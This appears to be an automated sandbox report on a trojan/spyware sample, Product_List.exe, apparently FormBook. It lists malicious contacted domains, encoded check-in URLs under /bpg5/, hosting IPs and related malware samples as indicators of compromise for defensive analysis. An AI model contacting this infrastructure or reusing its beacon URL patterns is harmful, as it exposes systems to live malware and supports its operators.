          https://www.antalyabfe.com/bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS30%Avira URL Cloudsafe
          http://www.42230.org/bpg5/www.42230.orgJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.bisarropainting.com/bpg5/www.bisarropainting.comJBfKk=_uLb4J-vJhW80%Avira URL Cloudsafe
          http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/t-i0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Se0%Avira URL Cloudsafe
          http://www.fabricadepack.fun0%Avira URL Cloudsafe
          http://www.vns96.net/bpg5/100%Avira URL Cloudmalware
          http://www.rt66omm.com/bpg5/www.rt66omm.comJBfKk=_uLb4J-vJhW8100%Avira URL Cloudmalware
          http://www.wearecatalyst.app0%Avira URL Cloudsafe
          http://www.musicandgros.com100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/we0%Avira URL Cloudsafe
          http://www.gomarketing.info/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==100%Avira URL Cloudmalware
          http://www.founder.com.cn/cnpl0%Avira URL Cloudsafe
          http://www.fabricadepack.fun/bpg5/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.berlinhealthweek.com
          		130.185.109.77
          		truetrueunknown
          www.gomarketing.info
          		198.177.124.57
          		truetrueunknown
          www.antalyabfe.com
          		188.114.97.7
          		truetrue
            		unknown
            www.rt66omm.com
            		118.27.125.172
            		truetrue
              		unknown
              www.jhg61.com
              		150.129.40.9
              		truetrue
                		unknown
                musicandgros.com
                		81.169.145.93
                		truetrue
                  		unknown
                  www.haynicorpon.biz
                  		183.90.228.46
                  		truetrue
                    		unknown
                    www.musicandgros.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.antalyabfe.com/bpg5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.gomarketing.info/bpg5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.haynicorpon.biz/bpg5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.rt66omm.com/bpg5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&JBfKk=_uLb4J-vJhW8true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.jhg61.com/bpg5/true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.musicandgros.com/bpg5/?8mBWmPn=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&JBfKk=_uLb4J-vJhW8true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.gomarketing.info/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabcmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drfalse
                        		high
                        http://www.jiyu-kobo.co.jp/Y0/BProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.vns96.net/bpg5/www.vns96.netJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.perkibeans.com/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=-15B7L5MNM.5.drfalse
                          		high
                          http://www.jhg61.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmycmd.exe, 00000005.00000002.811239362.000000000089A000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.carterandcone.comerProduct_List.exe, 00000000.00000003.555688597.00000000056E3000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.wearecatalyst.app/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.techwithsun.com/bpg5/www.techwithsun.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.fontbureau.com/designersProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.thetowerbells.com/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://rt66omm.com/bpg5/?8mBWmPn=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVfexplorer.exe, 00000004.00000002.826129272.0000000016800000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.814741230.0000000003FF0000.00000004.10000000.00040000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.haynicorpon.bizexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.825175140.000000000E086000.00000040.80000000.00040000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mysparexrewards.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.jiyu-kobo.co.jp/aeProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.rt66omm.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.gomarketing.infoexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.sajatypeworks.comProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cTheProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comgritaProduct_List.exe, 00000000.00000003.568009950.00000000056E3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cnl-gProduct_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.perkibeans.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.antalyabfe.com/bpg5/www.antalyabfe.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://en.wikipfjProduct_List.exe, 00000000.00000003.554309113.00000000056EE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.vns96.netexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.galapagosdesign.com/DPleaseProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.urwpp.deDPleaseProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.zhongyicts.com.cnProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.jiyu-kobo.co.jp/heProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.founder.com.cn/cnto(lProduct_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.thetowerbells.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.jhg61.com/bpg5/www.jhg61.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mysparexrewards.com/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.jhg61.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.berlinhealthweek.com/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 00000004.00000000.608430736.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.bisarropainting.comADexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-15B7L5MNM.5.drfalse
                              		high
                              http://www.42230.orgIexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.comaSeProduct_List.exe, 00000000.00000003.568009950.00000000056E3000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.581333592.00000000056E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=cmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drfalse
                                		high
                                http://www.jiyu-kobo.co.jp/jp/MeProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.carterandcone.comlProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.berlinhealthweek.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.fontbureau.com/designers/frere-user.htmlProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.perkibeans.com/bpg5/www.perkibeans.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/jp/~eProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.founder.com.cn/cnskProduct_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.thetowerbells.com/bpg5/www.thetowerbells.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.bisarropainting.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.gomarketing.info/bpg5/www.gomarketing.infoJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.techwithsun.com/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.fontbureau.com/designersGProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/?Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.comweProduct_List.exe, 00000000.00000003.568009950.00000000056E3000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.581333592.00000000056E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/bTheProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000004.00000000.608430736.00007FF883839000.00000002.00000001.01000000.0000000B.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://search.yahoo.com?fr=crmas_sfpfcmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drfalse
                                          		high
                                          http://www.tiro.comProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.antalyabfe.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.musicandgros.com/bpg5/www.musicandgros.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.goodfont.co.krProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.techwithsun.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.founder.com.cn/cnDProduct_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.typography.netDProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.antalyabfe.com/bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3explorer.exe, 00000004.00000002.826129272.00000000164DC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.814741230.0000000003CCC000.00000004.10000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.bisarropainting.com/bpg5/www.bisarropainting.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/t-iProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.42230.org/bpg5/www.42230.orgJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.rt66omm.com/bpg5/www.rt66omm.comJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/SeProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fabricadepack.funexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appJBfKk=_uLb4J-vJhW8explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.fonts.comProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.comProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.wearecatalyst.appexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vns96.net/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.apache.org/licenses/LICENSE-2.0Product_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.comProduct_List.exe, 00000000.00000002.592819910.0000000006D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.musicandgros.comexplorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icocmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drfalse
                                                  		high
                                                  http://www.jiyu-kobo.co.jp/weProduct_List.exe, 00000000.00000003.556548795.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, Product_List.exe, 00000000.00000003.556754967.00000000056E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fabricadepack.fun/bpg5/explorer.exe, 00000004.00000002.816897266.0000000005AC6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.founder.com.cn/cnplProduct_List.exe, 00000000.00000003.554839130.00000000056EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcmd.exe, 00000005.00000003.665023503.0000000000945000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.5.drfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    188.114.97.7
                                                    		www.antalyabfe.comEuropean Union
                                                    		13335CLOUDFLARENETUStrue
                                                    130.185.109.77
                                                    		www.berlinhealthweek.comGermany
                                                    		51191XIRRADEtrue
                                                    81.169.145.93
                                                    		musicandgros.comGermany
                                                    		6724STRATOSTRATOAGDEtrue
                                                    198.177.124.57
                                                    		www.gomarketing.infoUnited States
                                                    		395681FINALFRONTIERVGtrue
                                                    118.27.125.172
                                                    		www.rt66omm.comJapan7506INTERQGMOInternetIncJPtrue
                                                    183.90.228.46
                                                    		www.haynicorpon.bizJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                                    150.129.40.9
                                                    		www.jhg61.comHong Kong
                                                    		132422TELECOM-HKHongKongTelecomGlobalDataCentreHKtrue

                                                    General Information

                                                    Joe Sandbox Version:37.1.0 Beryl
                                                    Analysis ID:870350
                                                    Start date and time:2023-05-19 17:49:24 +02:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 12m 18s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:5
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample file name:Product_List.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@9/7
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 77.4% (good quality ratio 70.7%)
                                                    • Quality average: 71.2%
                                                    • Quality standard deviation: 32.3%
                                                    HCA Information:
                                                    • Successful, ratio: 99%
                                                    • Number of executed functions: 51
                                                    • Number of non-executed functions: 115
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): audiodg.exe
                                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    17:50:33API Interceptor1x Sleep call for process: Product_List.exe modified
                                                    17:51:00API Interceptor711x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    188.114.97.7PS_231.exeGet hashmaliciousFormBookBrowse
                                                    • www.antalyabfe.com/bpg5/?HqE8Cy=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XPyE6fdrEdOiZ3g==&kyx=IT_WJ
                                                    revised_order.exeGet hashmaliciousFormBookBrowse
                                                    • www.cassino-portugal.com/m82/?1b=aPUh&9rid=q5WWiyphIs/bKTrZG/AoLdDOKUkxd1ynKuyzuW8dTh3WHx0Y5kK0BjYqLcmSWI1uwK9o
                                                    Docx_88635641837.200855.20104.lNk.lnkGet hashmaliciousUnknownBrowse
                                                    • 0tuiw8.lookjeans.life/?1/
                                                    http://097689.260mb.net/Get hashmaliciousUnknownBrowse
                                                    • suspended-website.com/a/images/backgroundblue.png
                                                    Remittance.htmGet hashmaliciousHTMLPhisherBrowse
                                                    • bogihali.online/offnormal.php
                                                    vundevjtbot.bin.exeGet hashmaliciousUnknownBrowse
                                                    • www.showmyipaddress.com/
                                                    file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                                    • potunulit.org/
                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • redport80.ru/
                                                    E5DpWZ7Yhr.exeGet hashmaliciousUnknownBrowse
                                                    • www.showmyipaddress.com/
                                                    ONOiP4wkdZ.exeGet hashmaliciousUnknownBrowse
                                                    • www.showmyipaddress.com/
                                                    24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                                    • www.antalyabfe.com/bpg5/?67FoqNQb=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&Bjk=Fjw7NbIMlZ8ijMXD
                                                    http://bbb.ylfeee.topGet hashmaliciousUnknownBrowse
                                                    • bbb.ylfeee.top/
                                                    invoice.exeGet hashmaliciousFormBookBrowse
                                                    • www.cassino-portugal.com/m82/?9r3t=ZTPtfb&aP=q5WWiyphIs/bKTrZG/AoLdDOKUkxd1ynKuyzuW8dTh3WHx0Y5kK0BjYqLcqrapZunMh59orRRw==
                                                    Inv_7623980.exeGet hashmaliciousFormBookBrowse
                                                    • www.kickskaart.com/m82/?S6IhC=Ff0tNOTzHwWilHfMGrFSofh2JwH891ZmJwBAf7EfU6QdwP+PIdI03JDY0M9rw3tYnAZb&k8qLR=JdrLURRHibKH
                                                    file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                    • potunulit.org/
                                                    ffm7cdrIhT.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                                    • potunulit.org/
                                                    cg8BToUla9.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                                    • potunulit.org/
                                                    Inv_7623980.exeGet hashmaliciousFormBookBrowse
                                                    • www.cassino-portugal.com/m82/?Zzu=6lGdov3&i0=q5WWiyphIs/bKTrZG/AoLdDOKUkxd1ynKuyzuW8dTh3WHx0Y5kK0BjYqLcqSFY5tpa9+9orWCA==
                                                    setup.exeGet hashmaliciousDjvu, Fabookie, SmokeLoaderBrowse
                                                    • potunulit.org/
                                                    DOS31092ES.exeGet hashmaliciousFormBookBrowse
